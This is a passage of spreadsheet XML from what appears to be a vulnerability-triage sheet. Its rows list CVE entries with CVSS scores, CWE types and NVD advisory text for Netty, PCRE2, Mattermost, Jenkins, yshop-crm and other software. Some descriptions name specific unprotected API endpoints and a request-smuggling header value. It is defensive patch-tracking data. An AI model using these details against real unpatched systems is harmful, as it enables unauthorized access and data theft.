      <c r="L933" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr"/>
      <c r="Q933" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>An input validation issue was addressed with improved input validation. This issue is fixed in iOS 27 and iPadOS 27. An attacker in radio range may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86885</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87073</t>
        </is>
      </c>
      <c r="D934" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E934" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F934" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr"/>
      <c r="Q934" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87073</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87076</t>
        </is>
      </c>
      <c r="D935" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E935" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F935" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="inlineStr"/>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr"/>
      <c r="Q935" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Discover.</t>
        </is>
      </c>
      <c r="S935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87076</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87116</t>
        </is>
      </c>
      <c r="D936" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E936" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F936" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="inlineStr"/>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr"/>
      <c r="Q936" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Threat Response.</t>
        </is>
      </c>
      <c r="S936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87116</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89034</t>
        </is>
      </c>
      <c r="D937" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E937" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="inlineStr"/>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr"/>
      <c r="L937" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr"/>
      <c r="Q937" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>TCH QRing smart ring model R20_B006 running firmware RT09R20_1.00.00_250318 contains an unauthenticated Bluetooth Low Energy access vulnerability that allows any nearby attacker to connect to the device without pairing, authentication, or user approval by exploiting the exposed Nordic UART Service which enforces no client authentication or command authorization. Attackers within Bluetooth Low Energy range can connect directly to the ring, bypassing the official application and cloud authentication, to read battery levels, activate live heart rate monitoring, and retrieve stored historical heart rate and blood oxygen records.</t>
        </is>
      </c>
      <c r="S937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89034</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89044</t>
        </is>
      </c>
      <c r="D938" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E938" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr"/>
      <c r="Q938" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>Netty versions 4.1.133.Final through 4.1.137.Final and 4.2.13.Final through 4.2.17.Final fail to properly validate the final transfer coding in the Transfer-Encoding header, allowing attackers to smuggle requests by using malformed encoding declarations. Attackers can split Transfer-Encoding headers across multiple lines or use values like 'chunked, xchunked' to bypass validation and decode messages as chunked when the final coding is not chunked, enabling request smuggling attacks.</t>
        </is>
      </c>
      <c r="S938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89044</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89158</t>
        </is>
      </c>
      <c r="D939" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E939" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr"/>
      <c r="Q939" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_compile_32 integer overflow and resultant out-of-bounds write.</t>
        </is>
      </c>
      <c r="S939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89158</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89160</t>
        </is>
      </c>
      <c r="D940" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E940" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr"/>
      <c r="Q940" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read during the PCRE2_MATCH_INVALID_UTF matching of an invalid UTF subject.</t>
        </is>
      </c>
      <c r="S940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89160</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91181</t>
        </is>
      </c>
      <c r="D941" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E941" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F941" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr"/>
      <c r="Q941" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 Fail to sanitize Team objects returned by the data retention teams endpoint which allows an authenticated user holding only the read-only Data Retention Policy permission to obtain a private team's secret invite_id and email, and use it to join the team without authorization, via GET /api/v4/data_retention/policies/{policy_id}/teams.. Mattermost Advisory ID: MMSA-2026-00702</t>
        </is>
      </c>
      <c r="S941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91181</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92139</t>
        </is>
      </c>
      <c r="D942" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E942" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F942" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="inlineStr"/>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K942" s="5" t="inlineStr"/>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr"/>
      <c r="Q942" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>Jenkins Bitbucket Push and Pull Request Plugin 4.0.1 and earlier trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.</t>
        </is>
      </c>
      <c r="S942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92139</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92417</t>
        </is>
      </c>
      <c r="D943" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E943" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="inlineStr"/>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr"/>
      <c r="Q943" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R943" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Open5GS up to 2.8.0. This affects the function ogs_pfcp_parse_volume_measurement in the library lib/pfcp/types.c of the component PFCP Handler. The manipulation results in null pointer dereference. The attack may be launched remotely. The patch is identified as 8f07b507b78ff94776f2cd49276eb116ed93d7f2. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="S943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92417</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92457</t>
        </is>
      </c>
      <c r="D944" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E944" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="inlineStr"/>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr"/>
      <c r="Q944" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R944" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains a missing authorization vulnerability in the CrmInvoiceController issueInvoice endpoint that allows authenticated back-office users to issue arbitrary invoices. Attackers can call the PUT /admin-api/crm/invoice/issue endpoint without required permissions to modify invoice status, inflate contract invoiced amounts with attacker-chosen values, and trigger invoice emails to arbitrary addresses.</t>
        </is>
      </c>
      <c r="S944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92457</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92460</t>
        </is>
      </c>
      <c r="D945" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E945" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="inlineStr"/>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr"/>
      <c r="Q945" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R945" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization on the GET /admin-api/crm/operatelog/page endpoint, allowing any authenticated back-office user to access the installation-wide audit trail. Attackers can query the operation log to retrieve operator names, display nicknames, client IP addresses, User-Agent strings, request URLs, action details, and customer identifiers without proper permission checks.</t>
        </is>
      </c>
      <c r="S945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92460</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92462</t>
        </is>
      </c>
      <c r="D946" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E946" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr"/>
      <c r="Q946" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization checks on the CrmFlowController deleteFlowStep endpoint, allowing any authenticated back-office user to delete arbitrary approval workflow steps. Attackers can invoke the DELETE /admin-api/crm/flow/delete-step endpoint without required permissions to remove approval steps that control contract, receivable, and invoice finalization processes.</t>
        </is>
      </c>
      <c r="S946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92462</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92463</t>
        </is>
      </c>
      <c r="D947" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E947" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="inlineStr"/>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr"/>
      <c r="Q947" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R947" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains an authorization failure in the GET /admin-api/system/user/page endpoint where the @PreAuthorize annotation is commented out, allowing authenticated back-office users without system:user:list permission to enumerate all users. Attackers with valid back-office credentials and a role with data scope ALL can retrieve the complete user directory including login names, nicknames, departments, email addresses, mobile numbers, and last login information.</t>
        </is>
      </c>
      <c r="S947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92463</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92468</t>
        </is>
      </c>
      <c r="D948" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E948" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="inlineStr"/>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr"/>
      <c r="Q948" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R948" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an authorization bypass vulnerability in the search-center service that allows authenticated attackers to read any Elasticsearch index by specifying the index name in POST /search/{indexName} and GET /agg/requestStat/{indexName}/{routing} path variables. Attackers can query arbitrary indices including sys_user to retrieve sensitive user records and password hashes without proper access controls.</t>
        </is>
      </c>
      <c r="S948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92468</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92567</t>
        </is>
      </c>
      <c r="D949" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E949" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="inlineStr"/>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr"/>
      <c r="Q949" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R949" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through version 5.0 contains an authorization bypass vulnerability in the POST /user/form/data/update endpoint that allows authenticated users to overwrite other users' form submission data. Attackers can discover submission identifiers allocated in narrow ranges and modify arbitrary form responses containing personal data by sending update requests without ownership validation.</t>
        </is>
      </c>
      <c r="S949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92567</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92570</t>
        </is>
      </c>
      <c r="D950" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E950" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="inlineStr"/>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr"/>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
